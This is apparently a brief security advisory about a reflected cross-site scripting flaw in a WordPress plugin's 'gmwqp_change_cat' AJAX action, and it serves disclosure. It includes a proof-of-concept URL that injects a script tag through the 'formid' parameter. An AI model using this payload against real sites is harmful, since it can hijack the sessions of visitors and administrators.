The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high privilege one like admin).
Make any unauthenticated or authenticated users (such as a logged-in admin) open the following URL:
https://example.com/wp-admin/admin-ajax.php?action=gmwqp_change_cat&option=taxonomy&formid="></select><script>alert(`xss`)</script>